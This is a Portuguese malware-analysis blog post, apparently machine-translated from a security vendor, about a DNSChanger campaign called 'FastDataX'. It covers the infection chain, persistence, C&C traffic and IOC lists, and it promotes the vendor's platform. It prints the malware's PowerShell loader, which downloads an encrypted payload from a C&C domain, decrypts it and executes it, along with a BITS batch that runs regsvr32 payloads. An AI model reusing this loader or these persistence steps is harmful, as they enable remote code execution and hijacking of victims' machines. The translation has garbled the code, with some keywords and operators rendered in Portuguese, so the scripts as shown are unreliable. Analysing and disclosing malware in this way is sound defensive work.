Recentemente evidências de uma nova campanha para uma variante do infame DNSChanger Trojan, que, como o próprio nome diz, altera as entradas de DNS de um computador para apontar para servidores de nomes mal intecionados. O novo Trojan foi identificado por meio de alertas de detecção comportamental C & C na mais avançada plataforma do Sistema de Proteção contra a Ameaças Avançadas que é fornecida pela 4Security. Esses alertas, por sua vez, acionaram uma investigação automática, que identificou outros domínios suspeitos e combinou todos os alertas relacionados em um incidente de segurança.
Quer saber mais sobre o Sistema de Proteção de Ameaças Avançadas clique aqui.
Usando ferramentas forenses da plataforma Sistema de Proteção contra a Ameaças Avançadas, foi possível determinar que a campanha DNSChanger utiliza características e padrões familiares, como scripts do PowerShell, trabalhos do BITS e padrões de comunicação usados em campanhas anteriores. Mais análises revelaram o ponto inicial de infecção, payloads relacionados e domínios adicionais e concluíram que todos fazem parte da nova campanha. Curiosamente, a campanha faz uso de novos domínios que foram registrados em março de 2017 e ainda precisam ser vinculados ao DNSChanger. Por isso, acreditamos que as plataformas que usam inteligência artificial, cyber intelligence com base máquinas de aprendizado (machine learning), são de fato, verdadeiramente úteis para detectar, investigar, mitigar e resolver incidentes como os reconhecidos APTs (Advanced Persistent Threat) que causam estragos financeiros em todos os cantos do planeta. Estima-se, segundo a MMC, que os prejuízos financeiros podem chegar até R$ 6,2 Trilhões de Reais. Leia mais aqui.
As campanhas DNSChanger anteriores estavam intimamente conectadas ao Adware e aos PUAs como fonte de (re) infecção. A campanha utiliza um arquivo chamado “fastdatax.exe” e a análise inicial sugere que isso pode ser o DNSChanger. Este arquivo cria as tarefas do BITS, que fazem as conexões de rede do DNSChanger para baixar e executar cargas úteis (payloads).
Nomeamos a campanha atual “FastDataX”, uma vez que gira em torno de um software com esse nome e se comunica com os sites da FastDataX [palavra do dicionário] .info.
O relato detalhado das descobertas da equipe de pesquisa incluem:
- Detecção inicial do malware por meio de alertas comportamentais de C & C
- Análise forense do ponto de infecção
- Métodos de persistência
- Análise de tráfego de rede relacionada
- Lista de IOCs
DETECÇÃO INICIAL
O Sistema de Proteção de Ameaças Avançadas emitiu vários alertas comportamentais de C & C pertencentes a vários domínios fastdatax * .info e iniciou uma investigação automática:
Sistema de Proteção contra Ameaças Avançadas– Alerta C & C (Análise Comportamental):
Sistema de proteção contra ameaças Avançadas – Análise de link:
PONTO DE INFECÇÃO
A análise forense do terminal alertado revelou o seguinte cenário: Um usuário baixou voluntariamente um arquivo malicioso de algum site de compartilhamento de arquivos, depois que o usuário clicou duas vezes no arquivo, um arquivo .xht (XHTML, um arquivo HTML definido como XML aplicação) foi descartado e executado.
O arquivo .xht incluía um link para:
http [: //] ab0cd85de032858b2efc-98b168bd21c640d1dbb3a0f567ddbbfe.r14.cf1.rackcdn.com/kOcQm1koU2hOmFWMxOJbQo0m9p/lpx.html
Além disso, exibiu várias imagens hospedadas pelo imgur.com, que são instruções sobre como salvar e executar o software baixado:
A execução do arquivo também desencadeou uma cadeia de eventos que levou à instalação de vários pacotes de software que podem ser categorizados como PUP/Adware. Entre eles estavam o YeaDesktop , PCCleanPlus , X-Madbench e FastDataX . Destes adwares, FastDataX estava olhando mais curioso e insidioso
Como nas campanhas anteriores (que abusaram de aplicativos como o Optimizer Pro e System Healer), esses Adware são o segundo estágio de infecção do DNSChanger.
PERSISTÊNCIA
Diversos mecanismos de persistência foram utilizados pelo PUP/Adware instalado:
- Registro ‘run’ key – abusado por tal Adware como YeaDesktop
- Tarefas agendadas com o nome do aplicativo, abusadas pelo Adware como ‘Pangody’ e X-Madbench. Por exemplo, uma tarefa agendada chamada “X-Madbench”, que executa rundll32 “C: \ Arquivos de programas \ X-Madbench \ X-Madbench.dll”, SceNcISYvR
- Tarefas agendadas com nomes aleatórios e GUID que executam DLLs via rundll32. Por exemplo, a tarefa agendada denominada “E3605470-291B-44EB-8648-745EE356599A”
- Tarefas agendadas com nomes aleatórios que executam o PowerShell (veja mais detalhes abaixo)
- Trabalhos BITS (veja mais detalhes abaixo)
PowerShell
O FastDataX.exe mantém a persistência por meio de uma tarefa agendada chamada “FastDataX”, e uma tarefa agendada adicional é criada em uma estrutura GUID ( 7D0A0D47-057F-040C-7E11-7E0D7905117D ). Esta tarefa é composta pelo seguinte PowerShell:
$ ErrorActionPreference = ”stop”;
$ sc = “SilentlyContinue”;
$ WarningPreference = $ sc;
$ ProgressPreference = $ sc;
$ VerbosePreference = $ sc;
$ DebugPreference = $ sc;
/ ************************************************* ***********
atualização do registro – posicione as janelas fora dos limites da tela
\ ************************************************* *********** /
função RegistryUpdate ($ p) {
$ n = “WindowPosition”;
experimentar{
New-Item -Path $ p | Out-Null;
}
pegar{
}
experimentar{
New-ItemProperty -Path $ p-nome $ n -PropertyType DWORD -Valor 201329664 Voltar para o início |
Out-Null;
}
pegar{
experimentar{
Set-ItemProperty -Path $ p -Name $ n -Value 201329664 | Out-Null;
}
pegar{
}
}
}
RegistryUpdate (“HKCU: \ Console \% SystemRoot% _System32_WindowsPowerShell_v1.0_powershell.exe”);
RegistryUpdate (“HKCU: \ Console \% SystemRoot% _System32_svchost.exe”);
RegistryUpdate (“HKCU: \ Console \ taskeng.exe”);
/ * este é o URL com os parâmetros GET * /
$ surl = ”http [: //] fastdataxster [.] info / u /? a = 2tpeW5PNy / ** recortado por Sistema de Proteção Contra Ameaças Avançadas para proteger a privacidade do cliente * / ”;
/ * fim do URL com params * /
$ stsk = ”{
7D0A0D47-057F-040C-7E11-7E0D7905117D
}
“;
$ prid = ”FastDataX”;
$ inid = ”NRMNUMSW”;
experimentar{
/ * verificar a versão do PS – se 1 sair) * /
if ($ PSVersionTable.PSVersion.Major -lt 2) {
pausa;
;
}
$ v = [System.Environment] :: OSVersion.Version;
/ * verifica se o env do Windows é inicial, em seguida, 8, saia se for * /
if ($ v.Major -eq 5) {
if (($ v.Minor -lt 2) -AND ((Get-WmiObject Win32_OperatingSystem).
ServicePackMajorVersion -lt 2)) {
pausa;
;
}
}
/ * verificação de usuário autorizado – se não for administrador – saia * /
if (-NOT ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]
:: GetCurrent ()). IsInRole ([Security.Principal.WindowsBuiltInRole] “Administrador”)) {
pausa;
}
/ ************************************************* ***********
* GET Solicite, baixe mais instruções, usando um UA “legítimo” (não realmente)
\ ************************************************* *********** /
função downloadCmd ($ url) {
$ rq = New-Object System.Net.WebClient;
$ rq.UseDefaultCredentials = $ true;
$ rq.Headers.Add (“user-agent” “Mozilla / 4.0 (compatível; MSIE 7.0; Windows NT 6.1;)”);
return [System.Text.Encoding] :: ASCII.GetString ($ rq.DownloadData ($ url));
}
/ ************************************************* ************************ \
* Esquema de descriptografia (segundo byte no stream usado como XOR + Offest, depois AND 0xFF
\ ************************************************* *********************** /
function decryptCmd ($ rawdata) {
$ bt = [Convert] :: FromBase64String ($ rawdata);
$ ext = $ bt [0];
$ key = $ bt [1] -bx ou 170;
para ($ i = 2;
$ i -lt $ bt.Length;
$ i ++) {
$ bt [$ i] = ($ bt [$ i] -bxor (($ chave + $ i) -band 255));
}
return (New-Object IO.StreamReader (New-Object IO.Compression.DeflateStream
(New-Object IO.MemoryStream ($ bt 2 ($ bt.Length- $ ext))) [IO.Compression.CompressionMode]
::Descomprimir)))
.ReadToEnd ();
}
$ sc = decryptCmd (downloadCmd ($ surl));
Invoke-Expression -command “$ sc”;
}
pegar{};
saída 0;
Este script PS combina uma mensagem GET de saída para informações do fastdataxster [.] E um corpo descriptografado. A resposta descriptografada contém dados de execução e, portanto, pode expandir as habilidades do malware quando desejar.
A estrutura deste PowerShell é semelhante a um script PS DNSChanger analisado anteriormente . Deve-se notar que o domínio incorporado no script é novo e não foi vinculado anteriormente à campanha DNSChanger.
Trabalho BITS:
O FastdataX também usa trabalhos BITS (Serviço de Transferência Inteligente em Segundo Plano) que geram mensagens HTTP Head para informações rápidas [.] Info e fastdataxfire [.]. Não foi possível encontrar informações on-line sobre esses domínios ou qualquer associação entre eles e a campanha atual de malware.
Dito isto, os dois tipos de trabalho do BITS são idênticos aos trabalhos do BITS analisados anteriormente .
O trabalho BITS a seguir é um exemplo de uma tarefa recuperada dos logs do BITS do endpoint infectado e é usada para baixar, instalar e executar a limpeza das cargas de malware.
Tarefa do BITS para criar lote
“cmd.exe” / c start / minuto cmd / c “(echo @echo desativado>” C: \ ProgramData \ 4806190a-7c75-
1 \ x.bat “&
bitsadmin de echo / completo 4806190a-7c75-1 ^> nul >> “C: \ ProgramData \ 4806190a-7c75-
1 \ x.bat “&
echo bitsadmin / cancele 4806190a-7c75-1 ^> nul >> “C: \ ProgramData \ 4806190a-7c75-
1 \ x.bat “&
eco se existir “C: \ ProgramData \ 4806190a-7c75-1 \ 4806190a-7c75-1.d” goto q >>
“C: \ ProgramData \ 4806190a-7c75-1 \ x.bat” &
para / f% i em (‘dir / a: -d / b / w “C: \ ProgramData \ 4806190a-7c75-1 \ * .tmp”‘) do (echo start
/ b / min regsvr32.exe / s / n / i: “! = 477863894806190a” “C: \ ProgramData \ 4806190a-7c75-1 \% i”
>> “C: \ ProgramData \ 4806190a-7c75-1 \ x.bat”))> nul &
echo: q >> “C: \ ProgramData \ 4806190a-7c75-1 \ x.bat” &
iniciar / b / min regsvr32.exe / s / n / i: “! = 477863894806190a” “C: \ ProgramData \ 4806190a-7c75-
1 \ 4806190a-7c75-1d “>>” C: \ ProgramData \ 4806190a-7c75-1 \ x.bat “&
eco do “C: \ ProgramData \ 4806190a-7c75-1 \ x.bat” ^ & exit >> “C: \ ProgramData \ 4806190a-
7c75-1 \ x.bat “&
“C: \ ProgramData \ 4806190a-7c75-1 \ x.bat” “./. S-1-5-21-3582221642-4087043515-2770962101-1001
Alterações nas configurações de DNS
DNSChanger tem usado um dos três métodos para alterar as configurações de DNS:
- Modificando as configurações ‘NameServer’ e ‘DHCPNameServer’ no registro do Windows, substituindo assim os servidores configurados por novos servidores DNS (chamando o DhcpNotifyConfigChange (API)
- Alterando a configuração do DNS do roteador (conforme analisado)
- Editando o arquivo HOSTS local
A variante ‘FastDatax’ do DNSChanger está usando o terceiro método. Ele adiciona vários domínios (consulte a lista na seção IOC deste artigo) que são usados para baixar cargas úteis adicionais
ANÁLISE DE REDE
Uma análise com o componente do Sistema de Proteção contra Ameaças Avançadas Network Forensics, que permite uma análise de rede detalhada, revelou evidências da comunicação C & C do malware:
Isso permitiu que a equipe de pesquisa da Cyber distinguisse entre três tipos de sessões com estruturas semelhantes:
- HEAD solicita sessões para “fastdataxfier [.] Info” e “fastdataxcast [.] Info”. Como discutido acima, estes são gerados por tarefas BITS FastDataX:
2. GET solicita sessões para “fastdataxster [.] Info” que foram geradas pelo script PowerShell mencionado acima:
3. Sessões de solicitação POST para “informações rápidas do [.] “, “ Informações do fastdataxium [.] ” E “informações do fastdataxify [.] ”
Deve-se observar que todos os domínios do FastDataX resultaram no endereço IP 81.171.14.67, que foi usado na campanha DNSChanger anterior.
Como pode ser visto nas imagens acima, os agentes do usuário usados pelo malware são diferentes uns dos outros e são falsificados. Um exemplo perceptível para isso é um “bug” na geração de um user agent, onde a palavra “user agent” aparece duas vezes.
Ele tem uma estrutura de tráfego semelhante que foi observada no passado e se referiu ao DNSChanger, onde os parâmetros continham informações do sistema e informações de configuração do DNS.
Abaixo está uma lista de IOCs identificados relacionados à campanha FastDataX.
IOCs
Domínios / IPs:
| Visto em 21-22.06.2017 em Sistema de Proteção Contra Ameaças Avançadas |
| 81.171.14.67 |
| informação de fastdataxium [.] |
| fastdataxcast [.] informação |
| fastdataxfire [.] informações |
| fastdataxster [.] informações |
| fastdataxient [.] informações |
| fastdataxify [.] informação |
Domínios relacionados:
| Domínio | Data de replicação do DNS passivo |
| fastdataxate.info | 2017-07-07 |
| fastdataxsage.info | 2017-07-06 |
| fastdataxigy.info | 2017-07-05 |
| fastdataxopoly.info | 2017-07-05 |
| fastdataxace.info | 2017-06-30 |
| fastdataxcube.info | 2017-06-27 |
| fastdataxdigita.info | 2017-06-27 |
| fastdataxmage.info | 2017-06-27 |
| fastdataxmancer.info | 2017-06-27 |
| fastdataxmaven.info | 2017-06-27 |
| fastdataxpro.info | 2017-06-27 |
| fastdataxrunner.info | 2017-06-27 |
| fastdataxstar.info | 2017-06-27 |
| fastdataxster.info | 2017-06-27 |
| fastdataxity.info | 2017-06-27 |
| fastdataxality.info | 2017-06-27 |
| fastdataxfeed.info | 2017-06-25 |
| fastdataxcast.info | 2017-06-21 |
| fastdataxfire.info | 2017-06-21 |
| fastdataxient.info | 2017-06-21 |
| fastdataxify.info | 2017-06-21 |
| fastdataxium.info | 2017-06-21 |
| fastdataxio.info | 2017-06-08 |
Domínios encontrados dentro do arquivo HOSTS
| agent.wizztrakys [.] com |
| bestoffersfortoday [.] com |
| bigpicturepop [.] com |
| bongadoom [.] com |
| burningcube [.] ru |
| csdimonetize [.] com |
| dl.azalee [.] site |
| dl.smashdl [.] com |
| downloadmyhost [.] com |
| dwl0.wizzlabs [.] com |
| dwl1.wizzlabs [.] com |
| getthefilenow [.] com |
| healthydownload [.] com |
| installpixel [.] com |
| internalcampaigntargets [.] com |
| levando2download [.] com |
| mess1.wizzmonetize [.] com |
| titiaredh [.] com |
| wapcanalyticsystem [.] com |
| wepcdisplaysystem [.] com |
| wepcmainsystem [.] com |
| wizzcaster [.] com |
Hashes:
| MD5 | SHA256 | Descrição |
| fdfebd2ba002b18eac079a1ac21ef70d | 16ea0a1c090e8084cbee7d5b9eb55d07d7db09eb58ee93fe096c9b624d9dae64 | Descarregador de carga útil (.xht) |
| a11e1be8f9418f4e075b4c9794bc75f8 | a779534bd4110602ef630a0afe8031f931d7fa4f7ef84b3e449d915a60d1b0ea | Pangody.dll |
| 8c03a0be7aadec4506fc52c4a507e320 | f1eda24967aafc09d82418d8e92a189221bdfe52befa7cbbdb6d8642a8ffd5b8 | X-Madbench.dll |
Continue lendo: Parte 2: DNSChanger está de volta e muito mais perigoso
